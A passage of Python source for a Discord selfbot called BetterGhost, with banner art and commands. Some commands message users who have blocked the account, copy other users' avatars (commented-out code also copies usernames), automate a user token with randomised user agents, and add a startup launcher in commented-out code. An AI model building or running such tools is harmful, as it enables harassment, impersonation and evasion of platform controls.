    #         print("Adding to startup.......")
    #         USER_NAME = getpass.getuser()
    #         def add_to_startup(file_path=""):
    #             if file_path == "":
    #                 file_path = os.path.dirname(os.path.realpath(__file__))
    #             bat_file = open(startupPath() + r"\\BetterGhost.bat", "w")
    #             bat_file.write(f"cd {file_path}\nstart BetterGhost")
    #             bat_file.close()
    #         add_to_startup()
    #     else:
    #         print("Removing from startup......")
    #         if os.path.exists(startupPath() + r"\\BetterGhost.bat"): os.remove(startupPath() + r"\\BetterGhost.bat");
    #         os.system("cls")
    if is_linux():
        os.system("clear")
    # NOTE(review): the mode checks below mix independent `if`s with one
    # `elif` chain (bear/old/fallback), and the fallback compares the raw
    # consoleMode (no .lower()) against consoleModes — an unknown or
    # oddly-cased mode can therefore print two banners. Confirm before
    # changing; behavior preserved here.
    if consoleMode.lower() == "new":
        print("")
        print(fg.consoleColour + "")
        print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
        print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
        print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
        print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
        print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
        print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "rainbow":
        # Same banner as "new" but one colour per row.
        print("")
        print(fg.consoleColour + "")
        print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
        print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
        print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
        print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
        print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
        print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "new2":
        print("")
        print(fg.consoleColour + "")
        print(" ______ __ __ ______ ______ ______ ".center(width))
        print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
        print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
        print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
        print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
        print(" ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "new3":
        print("")
        print(fg.consoleColour + "")
        print(" 88 ".center(width))
        print(" 88 ,d ".center(width))
        print(" 88 88 ".center(width))
        print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
        print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
        print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
        print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
        print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
        print(' aa, ,88 '.center(width))
        print(' "Y8bbdP" '.center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "new4":
        print("")
        print(fg.consoleColour + "")
        print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
        print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
        print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
        print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
        print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
        print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
        print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
        print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "bear":
        # This mode resizes the Windows console, so the width is re-queried
        # per line instead of using the stale `width` captured above.
        if is_windows():
            os.system("mode con: cols=90 lines=24")
        print("")
        print(fg.consoleColour + "")
        print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
        print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
        print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
        print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
        print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
        print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
        print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
        print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
        print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
        print("")
        print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
        print(fg.consoleColour + '─'*os.get_terminal_size().columns)
        print("")
    elif consoleMode.lower() == "old":
        print("")
        print(fg.consoleColour + "")
        print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
        print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
        print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
        print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
        print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
        print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
        print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
        print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
        print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    elif consoleMode not in consoleModes:
        # Fallback banner for unrecognised modes (same art as "new").
        # NOTE(review): this comparison is case-sensitive unlike the others.
        print("")
        print(fg.consoleColour + "")
        print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
        print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
        print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
        print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
        print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
        print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "react":
        print("")
        print(fg.consoleColour + "")
        print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
        print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
        print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
        print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
        print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
        print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    if consoleMode.lower() == "rise":
        # "rise" additionally prints a status box with account details.
        print(fg.cBlue + "")
        print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
        print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
        print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
        print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
        print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
        print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
        print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
        print(fg.cGrey + f"Connected: {BetterGhost.user} | Prefix: {BetterGhost.command_prefix} | Servers: {len(BetterGhost.guilds)}".center(width))
        print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
        print("")
        print(fg.cBlue + '━'*width)
        print("")
    if consoleMode.lower() == "nighty":
        # "nighty" also resizes the Windows console and prints a status block.
        if is_windows():
            os.system("mode con: cols=90 lines=24")
        print("")
        print(f" {fg.cWhite}███{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}████████{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗")
        print(f" {fg.cWhite}████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔════╝ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║╚══{fg.cWhite}██{fg.consoleColour}╔══╝╚{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╔╝")
        print(f" {fg.cWhite}██{fg.consoleColour}╔{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}███{fg.consoleColour}╗{fg.cWhite}███████{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}╔╝ ")
        print(f" {fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔══{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}██{fg.consoleColour}╔╝ ")
        print(f" {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██████{fg.consoleColour}╔╝{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ")
        print(fg.consoleColour + f" ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ")
        print("")
        print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
        print(f"{fg.cWhite}Account: {BetterGhost.user} [{len(BetterGhost.guilds)} servers] [{len(get_friends(__token__))} friends]")
        print(f"{fg.cWhite}Prefix: {BetterGhost.command_prefix}")
        print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {BetterGhost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
# Warn the user when running a pre-release (beta/dev) build.
# NOTE(review): placement assumed to be module-level startup code — confirm
# against the original file's indentation.
if "beta" in version.lower():
    print_important("You're currently using a beta build of BetterGhost.")
    print_important("If you notice any bugs please report them to the developer.")
    print(" ")
elif "dev" in version.lower():
    print_important("You're currently using a developer build of BetterGhost.")
    print_important("If you notice any bugs please report them to the developer.")
    print(" ")
@BetterGhost.command(name="blocksend", description="Send a message to a blocked user.", usage="blocksend [user id] [messages]", aliases=["sendblocked", "sendtoblocked"])
async def blocksend(ctx, userid:int, *, message):
    """DM a blocked user by briefly unblocking them.

    The user is unblocked, messaged, then immediately re-blocked, so the
    block state is restored after the send.

    Parameters:
        ctx: command invocation context.
        userid: numeric id of the blocked user.
        message: text to send (rest of the command line).
    """
    user = await BetterGhost.fetch_user(userid)
    await user.unblock()
    await user.send(message)
    await user.block()
    if __embedmode__:
        embed = discord.Embed(title=f"Block Send", description=f"Sent `{message}` to {user}.", color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"Sent `{message}` to {user}.", delete_after=__deletetimeout__)
@BetterGhost.command(name="riskmode", description="Disable and enable risk mode", usage="riskmode")
async def riskmode(ctx):
    """Flip the global risk-mode flag, persist it, and confirm the new state."""
    global __riskmode__
    # Toggle once; both the config write and the reply derive from the result.
    __riskmode__ = not __riskmode__
    cfg = Config.getConfig()
    cfg["riskmode"] = __riskmode__
    Config.saveConfig(cfg)
    riskModeText = "enabled" if __riskmode__ else "disabled"
    if __embedmode__:
        embed = discord.Embed(description=f"Risk mode has been {riskModeText}.", color=__embedcolour__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"Risk mode has been {riskModeText}.", delete_after=__deletetimeout__)
@BetterGhost.command(name="embedmode", description="Toggle embed mode.", usage="embedmode")
async def embedmode(ctx):
    """Switch output to embed mode (persisted), or report it is already on."""
    global __embedmode__
    freshly_enabled = not __embedmode__
    if freshly_enabled:
        __embedmode__ = True
        cfg = Config.getConfig()
        cfg["embed_mode"] = True
        Config.saveConfig(cfg)
    notice = "Embed mode has been enabled." if freshly_enabled else "Embed mode is already enabled."
    # __embedmode__ is True on both paths here, so the embed branch is taken;
    # the plain-text branch is kept as a defensive fallback.
    if __embedmode__:
        embed = discord.Embed(title=notice, color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(notice, delete_after=__deletetimeout__)
@BetterGhost.command(name="textmode", description="Toggle text mode.", usage="textmode")
async def textmode(ctx):
    """Switch output to plain-text mode (persisted), or report it is already on."""
    global __embedmode__
    was_embed = __embedmode__
    if was_embed:
        __embedmode__ = False
        cfg = Config.getConfig()
        cfg["embed_mode"] = False
        Config.saveConfig(cfg)
    notice = "Text mode has been enabled." if was_embed else "Text mode is already enabled."
    # __embedmode__ is False on both paths here, so the plain-text branch is
    # taken; the embed branch is kept as a defensive fallback.
    if __embedmode__:
        embed = discord.Embed(title=notice, color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(notice, delete_after=__deletetimeout__)
@BetterGhost.command(name="readall", description="Mark every message as read.", usage="readall")
async def readall(ctx):
    """Acknowledge (mark as read) the newest message of every text channel.

    Walks every guild, fetches the latest message of each readable text
    channel, bulk-acks them per guild via Discum, and reports totals.
    """
    index = 0    # channels visited
    index2 = 0   # messages acknowledged
    DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
    for guild in BetterGhost.guilds:
        messages2 = []
        for channel in guild.text_channels:
            index += 1
            try:
                messages = await channel.history(limit=1, oldest_first=False).flatten()
                for message in messages:
                    index2 += 1
                    messages2.append({"channel_id": str(channel.id), "message_id": str(message.id)})
                print_info(f"({channel.name}) Fetched new messages to read.")
            except Exception:
                # Fix: narrowed from a bare `except:` so KeyboardInterrupt /
                # SystemExit still propagate; unreadable channels are skipped.
                pass
        DiscumClient.bulkAck(messages2)
        print_info(f"Read all messages in {guild.name}.")
    print_info("All messages have been read.")
    await ctx.send(f"Read a total of `{index}` channels and `{index2}` messages.")
@BetterGhost.command(name="specs", description="Your computers specifications.", usage="specs", aliases=["computerspecs", "pcspecs", "specifications"])
async def specs(ctx):
    """Report the host machine's OS, architecture, CPU, GPUs and RAM usage."""
    def get_size(num_bytes, suffix="B"):
        # Human-readable byte count, e.g. 1.50MB. Fixes: parameter renamed so
        # the `bytes` builtin is no longer shadowed, and a final fallback is
        # returned instead of falling off the loop (which returned None for
        # values >= 1024 PB).
        factor = 1024
        for unit in ["", "K", "M", "G", "T", "P"]:
            if num_bytes < factor:
                return f"{num_bytes:.2f}{unit}{suffix}"
            num_bytes /= factor
        return f"{num_bytes:.2f}E{suffix}"
    uname = platform.uname()
    svmem = psutil.virtual_memory()
    system = uname.system
    machine = uname.machine
    cpu = platform.processor()
    ram = str(get_size(svmem.used)) + "/" + str(get_size(svmem.total))
    gpus = [gpu.name for gpu in GPUtil.getGPUs()]
    if __embedmode__:
        embed = discord.Embed(title="Specifications", color=__embedcolour__)
        embed.add_field(name="System", value=f"```{system}```")
        embed.add_field(name="Machine", value=f"```{machine}```")
        embed.add_field(name="RAM", value=f"```{ram}```")
        embed.add_field(name="CPU", value=f"```{cpu}```")
        embed.add_field(name="GPUs", value=f"```{', '.join(gpus)}```")
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.set_thumbnail(url=__embedimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed, delete_after=__deletetimeout__)
    else:
        await ctx.send(f"""```ini
[ Specifications ]
System: {system}
Machine: {machine}
CPU: {cpu}
GPUs: {', '.join(gpus)}
RAM: {ram}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="crypto", description="Get the current data on a cryptocurrency.", usage="crypto [currency]", aliases=["cryptodata"])
async def crypto(ctx, *, currency="bitcoin"):
    """Look up a coin on the CoinGecko API and post its scores and prices.

    Parameters:
        ctx: command invocation context.
        currency: CoinGecko coin id (e.g. "bitcoin", "ethereum").

    Any non-200 response (unknown coin, rate limit, outage) is reported as
    an invalid currency.
    NOTE(review): blocking requests.get inside an async command stalls the
    event loop; "Commuinity" below is a typo in a runtime string, left as-is.
    """
    request = requests.get(f"https://api.coingecko.com/api/v3/coins/{currency}")
    if request.status_code == 200:
        # Reuse the name for the decoded JSON payload (original behavior).
        request = request.json()
        if __embedmode__:
            embed = discord.Embed(title=f"{request['name']} Data", color=__embedcolour__)
            embed.add_field(name="Scores", value=f"""```
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
```""", inline=False)
            embed.add_field(name="Current Prices", value=f"""```
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
```""", inline=False)
            embed.add_field(name="Last 24h Price Change", value=f"""```
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
```""", inline=False)
            embed.set_thumbnail(url=request["image"]["large"])
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send(f"""```ini
[ {request['name']} Data ]
[Scores]
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
[Current Prices]
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
[Last 24h Price Change]
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
# {__embedfooter__}
```""")
    else:
        if __embedmode__:
            embed = discord.Embed(title="Invalid Crypto", description="That crypto currency doesnt exist or there was an error.", color=__embedcolour__)
            embed.set_thumbnail(url=__embedimage__)
            embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
            embed.timestamp = datetime.now()
            await ctx.send(embed=embed)
        else:
            await ctx.send(f"""```ini
[ Invalid Crypto ]
That crypto currency doesnt exist or there was an error.
# {__embedfooter__}
```""")
@BetterGhost.command(name="proxies", description="Scrape an type of proxy.", usage="proxies [http, https, socks4, socks5, all]", aliases=["proxygen", "genproxies"])
async def proxies(ctx, type):
    """Scrape proxies of the requested type and upload them as a file.

    Results are appended to data/proxies/<type>.txt. Unknown types do
    nothing, matching the original branch-per-type behavior.

    Parameters:
        ctx: command invocation context.
        type: one of "http", "https", "socks4", "socks5", "all".
    """
    # Fix: the five copy-pasted branches collapsed into one table-driven path,
    # and the output file is now closed via `with` even if the request fails.
    labels = {
        "http": "HTTP",
        "https": "HTTPS",
        "socks4": "SOCKS4",
        "socks5": "SOCKS5",
        "all": "HTTP, HTTPS, SOCKS4 AND SOCKS5",
    }
    if type not in labels:
        return
    os.makedirs("data/proxies/", exist_ok=True)
    path = f"data/proxies/{type}.txt"
    # NOTE(review): blocking requests.get inside an async command.
    request = requests.get(f"https://api.proxyscrape.com/?request=displayproxies&proxytype={type}&timeout=5000")
    proxies = []
    with open(path, "a+") as file:
        for proxy in request.text.split("\n"):
            proxy = proxy.strip()
            if proxy:
                proxies.append(proxy)
                file.write(str(proxy)+"\n")
    await ctx.send(content=f"Scraped `{len(proxies)}` {labels[type]} proxies.", file=discord.File(path))
@BetterGhost.command(name="stealpfp", description="Set someones avatar as your avatar.", usage="stealpfp [@user]", aliases=["stealavatar"])
async def stealpfp(ctx, user:discord.User):
    """Download a user's avatar and set it as this account's own avatar."""
    DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
    avatar1 = user.avatar
    # Avatar URLs end with e.g. ".png?size=1024": dropping the last 10 chars
    # strips the query suffix, then the last 3 chars are the extension.
    # NOTE(review): assumes a 3-letter extension — "jpeg"/"webp" would be
    # mis-sliced; confirm against the avatar URL format in use.
    extension = str(avatar1)[:-10][-3:]
    # Fix: use a context manager so the handle is flushed and closed before
    # Discum re-opens the file (the original leaked an open file object).
    with open(f"data/pfpstealavatar.{extension}", "wb") as avatar_file:
        avatar_file.write(requests.get(str(avatar1), allow_redirects=True).content)
    DiscumClient.setAvatar(f"data/pfpstealavatar.{extension}")
    await ctx.send(f"Stolen `{user}`'s avatar.", delete_after=__deletetimeout__)
# @BetterGhost.command(name="stealusername", description="Steal someones username.", usage="stealusername [@user]", aliases=["stealname"])
# async def stealusername(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# username = user.name
# DiscumClient.setUsername(username)
# await ctx.send(f"Stolen `{user}`'s username.", delete_after=__deletetimeout__)
# @BetterGhost.command(name="stealprofile", description="Steal someones avatar and username.", usage="stealprofile [@user]")
# async def stealprofile(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# avatar = user.avatar
# username = user.name
# extension = str(avatar)[:-10][-3:]
# open(f"data/pfpstealavatar.{extension}", "wb").write(requests.get(str(avatar), allow_redirects=True).content)
# DiscumClient.setAvatar(f"data/pfpstealavatar.{extension}")
# DiscumClient.setUsername(username)
@BetterGhost.command(name="cloneemoji", description="Clone an emoji to the command server.", usage="cloneemoji [emoji]", aliases=["stealemoji"])
async def cloneemoji(ctx, *, msg):
    """Find an emoji across all guilds by mention/id/name and recreate it in this guild.

    Parameters:
        ctx: command invocation context.
        msg: an emoji mention (<:name:id>), a raw id, or a (partial) name.
    """
    # If the argument is a full <:name:id> mention, reduce it to the bare id.
    msg = re.sub("<:(.+):([0-9]+)>", "\\2", msg)
    match = None
    exact_match = False
    for guild in BetterGhost.guilds:
        for emoji in guild.emojis:
            # Partial (substring) match: remember the latest candidate but
            # keep scanning in case an exact match turns up later.
            if msg.strip().lower() in str(emoji):
                match = emoji
            # Exact id or name match wins immediately; break out of both loops.
            if msg.strip() in (str(emoji.id), emoji.name):
                match = emoji
                exact_match = True
                break
        if exact_match:
            break
    if not match:
        return await ctx.send("Couldnt find that emoji.")
    # NOTE(review): blocking requests.get inside an async command.
    response = requests.get(match.url)
    emoji = await ctx.guild.create_custom_emoji(name=match.name, image=response.content)
    await ctx.send(f"Successfully cloned `{emoji.name}`.")
@BetterGhost.command(name="detections", description="A list of all detections.", usage="detections")
async def detections(ctx):
    """List every detection toggle from the config with its current state."""
    cfg = Config.getConfig()
    # One formatting template chosen up front instead of branching per item.
    template = "**{}** : {}" if __embedmode__ else "{} : {}"
    _list = [template.format(name, state) for name, state in cfg["detections"].items()]
    if __embedmode__:
        embed = discord.Embed(title="Detections", description='\n'.join(_list), color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed)
    else:
        await ctx.send("```ini\n[ Detections ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@BetterGhost.command(name="snipers", description="A list of all snipers.", usage="snipers")
async def snipers(ctx):
    """List every sniper toggle from the config with its current state."""
    cfg = Config.getConfig()
    # One formatting template chosen up front instead of branching per item.
    template = "**{}** : {}" if __embedmode__ else "{} : {}"
    _list = [template.format(name, state) for name, state in cfg["snipers"].items()]
    if __embedmode__:
        embed = discord.Embed(title="Snipers", description='\n'.join(_list), color=__embedcolour__)
        embed.set_thumbnail(url=__embedimage__)
        embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
        embed.timestamp = datetime.now()
        await ctx.send(embed=embed)
    else:
        await ctx.send("```ini\n[ Snipers ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@BetterGhost.command(name="enabledetect", description="Enable a detection.", usage="enabledetect [type]", aliases=["enabledetection", "enabledetections"])
async def enabledetect(ctx, *, type):
    """Turn on the detection whose name matches `type` (case-insensitive)."""
    cfg = Config.getConfig()
    wanted = type.lower()
    matched = [key for key in cfg["detections"] if key.lower() == wanted]
    for key in matched:
        cfg["detections"][key] = True
        Config.saveConfig(cfg)
    if matched:
        await ctx.send(f"Enabled `{type}` detection.")
    else:
